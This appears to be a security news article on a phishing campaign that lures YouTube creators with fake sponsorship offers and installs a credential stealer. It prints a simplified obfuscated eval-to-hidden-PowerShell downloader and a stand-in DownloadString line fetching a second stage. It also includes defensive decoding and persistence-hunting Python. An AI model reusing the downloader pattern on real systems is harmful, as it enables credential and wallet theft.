Cyber Security News

YouTube Creators Under Attack via Brand Collaboration Requests Using Clickflix Technique

A sophisticated phishing campaign dubbed the “Clickflix Technique” has emerged, targeting YouTube content creators through seemingly legitimate brand collaboration requests.

This new attack vector exploits creators’ eagerness to secure sponsorship deals by disguising malware payloads as partnership documentation.

Cybercriminals initiate contact via email or social media, posing as marketing representatives from established brands offering lucrative deals that require the creator to review “campaign materials” hosted on compromised domains or cloud storage.

The attackers typically approach creators with subscriber counts between 10,000 and 500,000, carefully crafting messages that reference the creator’s content style and previous sponsorships to establish credibility.

Upon clicking the malicious links, creators are directed to professional-looking landing pages mimicking popular file-sharing services where they’re prompted to download what appears to be a PDF contract or campaign brief.

CloudSEK researchers identified this campaign in early March 2025, noting that the malware employs a multi-stage infection process designed to evade traditional security solutions.

Mindmap of malware campaign (Source – CloudSEK)

Their analysis revealed that over 2,300 creators have been targeted across gaming, technology review, and lifestyle niches, with approximately 18% of targets successfully compromised.

The attack leverages social engineering principles combined with technical deception, often including time-sensitive offers to pressure creators into hasty decisions.

Victims report receiving customized messages referencing specific videos they’ve produced, indicating significant reconnaissance efforts by the threat actors prior to initiating contact.

Infection Mechanism Exploits JavaScript Obfuscation

The malware’s primary infection vector employs a sophisticated JavaScript downloader that executes when victims open what appears to be a standard HTML preview page.

Process Tree (Source – CloudSEK)

The initial payload utilizes multiple layers of obfuscation, with the final stage resembling this simplified example:

const decoderKey = navigator.userAgent.slice(0,8);
eval(function(p,a,c,k,e,d){
  /* heavily obfuscated PowerShell downloader */  return p;
}('powershell -w hidden -e JGNsaWVudCA9...'))

This obfuscated code ultimately triggers a PowerShell command, launched with “-w hidden” (no visible console window) and “-e” (a base64-encoded script passed on the command line), that downloads a stealer targeting browser data, with particular emphasis on YouTube Studio credentials, Google authentication tokens, and cryptocurrency wallet information.
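The first thing an analyst does with a stage like the one above is recover the script hidden behind “-e”. The Python below is an added example written for this article, not code from CloudSEK’s report or from the campaign: it pulls the encoded argument out of a powershell.exe command line, decodes it the way powershell.exe does (base64 of UTF-16LE text), falls back to UTF-8 for hand-made or truncated samples, and records whether the window was hidden and whether the script reaches out for more content. The command line and the script inside it are constructed stand-ins; the only real data is the 12-character prefix the article shows, and the elided remainder is not guessed.

```python
import base64
import shlex

# Constructed samples, not the campaign's payload. SAMPLE_SCRIPT is a harmless
# stand-in for the downloader stage; SAMPLE_CMDLINE wraps it the way the
# page's final stage does ("powershell -w hidden -e <base64>"). powershell.exe
# expects the blob to be base64 of UTF-16LE text.
SAMPLE_SCRIPT = ("$client = New-Object Net.WebClient; "
                 "$client.DownloadString('http://example.invalid/stage2')")
SAMPLE_CMDLINE = "powershell -w hidden -e " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# The only part of the real blob the article shows is this prefix; the rest
# is elided there and is not guessed here.
PAGE_PREFIX = "JGNsaWVudCA9"


def _looks_like_script(text: str) -> bool:
    """PowerShell source is almost entirely ASCII and never contains NULs.
    UTF-8 bytes misread as UTF-16LE yield CJK-range characters, and UTF-16LE
    bytes misread as UTF-8 yield NULs, so this rejects both mistakes."""
    if not text or "\x00" in text:
        return False
    ascii_chars = sum(1 for ch in text if ord(ch) < 128)
    return ascii_chars / len(text) > 0.9


def decode_blob(blob: str) -> tuple:
    """Decode a -EncodedCommand blob: UTF-16LE first (what powershell.exe
    does), then UTF-8 as a fallback. Returns (encoding_used, script)."""
    padded = blob + "=" * (-len(blob) % 4)      # samples often lose '=' padding
    raw = base64.b64decode(padded)
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _looks_like_script(text):
            return enc, text
    raise ValueError("blob does not decode to a plausible script")


def triage_cmdline(cmdline: str) -> dict:
    """Pull the encoded command out of a powershell.exe command line and
    record the two switches the downloader relies on."""
    tokens = shlex.split(cmdline)
    hidden = False
    blob = None
    for tok, nxt in zip(tokens, tokens[1:]):
        low = tok.lower()
        if low in ("-w", "-windowstyle") and nxt.lower() == "hidden":
            hidden = True
        # powershell.exe accepts any unambiguous prefix of -EncodedCommand
        # (-e, -ec, -enc, ...); "-ep" (ExecutionPolicy) is not one of them.
        if len(low) >= 2 and "-encodedcommand".startswith(low):
            blob = nxt
    if blob is None:
        raise ValueError("no -EncodedCommand argument found")
    enc, script = decode_blob(blob)
    fetch_apis = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "invoke-restmethod", "net.webclient", "start-bitstransfer")
    return {
        "hidden_window": hidden,
        "encoding": enc,
        "script": script,
        "fetches_remote_content": any(k in script.lower() for k in fetch_apis),
    }


if __name__ == "__main__":
    result = triage_cmdline(SAMPLE_CMDLINE)
    print(f"hidden={result['hidden_window']} encoding={result['encoding']}")
    print(result["script"])
    print(decode_blob(PAGE_PREFIX))
```

Run against the visible prefix alone, decode_blob returns UTF-8 text (“$client =”) rather than UTF-16LE, which is consistent with the article’s snippet being a simplified illustration rather than a verbatim capture; a blob that powershell.exe would actually accept decodes cleanly as UTF-16LE, as the constructed SAMPLE_CMDLINE does.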

The malware establishes persistence through Windows Registry modifications and scheduled tasks with innocuous names like “GoogleUpdateTask” to avoid detection during routine system inspections.
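A name like “GoogleUpdateTask” survives a casual look at Task Scheduler because it sits next to the genuine Google Update tasks. The Python below is an added example for this article, not CloudSEK’s code or a sample from the campaign: it scores scheduled tasks and Run-key values on what they execute rather than what they are called. It assumes that the genuine updater on a default Chrome install runs from the Google\Update directory under Program Files and that tasks with a Google Update name but a binary elsewhere are suspect; the scoring weights, the task export (constructed in the shape of “schtasks /query /fo CSV /v”, trimmed to the columns used) and the Run values are all constructed for the example.

```python
import csv
import io
import re
from pathlib import PureWindowsPath

# Constructed sample in the shape of `schtasks /query /fo CSV /v`, trimmed to
# the columns used below. Rows 1-2 mimic the genuine Google Update tasks, row 3
# is the kind of lookalike the article describes, row 4 is a control.
SAMPLE_TASKS_CSV = r'''"TaskName","Task To Run","Author"
"\GoogleUpdateTaskMachineCore{0F1E2D3C-4B5A-6978-8796-A5B4C3D2E1F0}","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c","N/A"
"\GoogleUpdateTaskMachineUA{0F1E2D3C-4B5A-6978-8796-A5B4C3D2E1F0}","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","N/A"
"\GoogleUpdateTask","powershell.exe -w hidden -e SQBFAFgA","CREATOR-PC\creator"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","Microsoft Corporation"
'''

# Constructed HKCU\...\CurrentVersion\Run values (value name -> command).
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\creator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "GoogleUpdate": r"powershell.exe -w hidden -e SQBFAFgA",
}

# Assumption: where the genuine updater lives on a default install. Adjust to
# your estate (or replace with an Authenticode check) before relying on it.
TRUSTED_GOOGLE_UPDATE_DIRS = {
    r"c:\program files (x86)\google\update",
    r"c:\program files\google\update",
}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
HIDDEN_OR_ENCODED = re.compile(
    r"-w(?:indowstyle)?\s+hidden|(?:^|\s)-e(?:n|nc|ncodedcommand)?\s", re.IGNORECASE)


def split_action(action: str) -> tuple:
    """Separate the executable from its arguments in a task or Run command."""
    action = action.strip()
    if action.startswith('"'):                       # quoted path
        end = action.find('"', 1)
        return action[1:end], action[end + 1:].strip()
    m = re.match(r"(.*?\.exe)\b(.*)", action, re.IGNORECASE | re.DOTALL)
    if m:                                            # unquoted path, may contain spaces
        return m.group(1).strip(), m.group(2).strip()
    head, _, tail = action.partition(" ")
    return head, tail.strip()


def assess(name: str, command: str) -> tuple:
    """Score one persistence entry. Weights are an assumption: name abuse and
    hidden/encoded PowerShell are strong signals, a user-writable path is weak."""
    exe, args = split_action(command)
    exe_low = exe.lower()
    exe_dir = str(PureWindowsPath(exe_low).parent)
    base = PureWindowsPath(exe_low).name
    lname = name.lower()
    score, reasons = 0, []
    if "google" in lname and "update" in lname and exe_dir not in TRUSTED_GOOGLE_UPDATE_DIRS:
        score += 3
        reasons.append("Google Update lookalike name, binary outside Google Update directory")
    if base in INTERPRETERS:
        score += 2
        reasons.append(f"runs script interpreter {base}")
    if HIDDEN_OR_ENCODED.search(args):
        score += 3
        reasons.append("hidden window or encoded PowerShell command")
    if any(frag in exe_low for frag in USER_WRITABLE):
        score += 1
        reasons.append("binary lives in a user-writable directory")
    return score, reasons


def hunt(tasks_csv: str, run_values: dict, threshold: int = 2) -> dict:
    """Return {entry: (score, reasons)} for every entry scoring >= threshold."""
    findings = {}
    for row in csv.DictReader(io.StringIO(tasks_csv.strip())):
        score, reasons = assess(row["TaskName"], row["Task To Run"])
        if score >= threshold:
            findings["task:" + row["TaskName"]] = (score, reasons)
    for name, command in run_values.items():
        score, reasons = assess(name, command)
        if score >= threshold:
            findings["run:" + name] = (score, reasons)
    return findings


if __name__ == "__main__":
    for entry, (score, reasons) in hunt(SAMPLE_TASKS_CSV, SAMPLE_RUN_VALUES).items():
        print(f"{score:>2}  {entry}: {'; '.join(reasons)}")
```

The two genuine Google Update rows score zero because their binary is where the updater is expected to be, while the lookalike task and the Run value score on all three strong signals. OneDrive, which legitimately runs from AppData, only picks up the weak user-writable point and stays below the threshold; that is the reason for weighting rather than flagging on any single rule.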

The attack demonstrates the growing sophistication of targeted campaigns against content creators who increasingly represent valuable targets due to their monetization potential and access to engaged audience networks.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
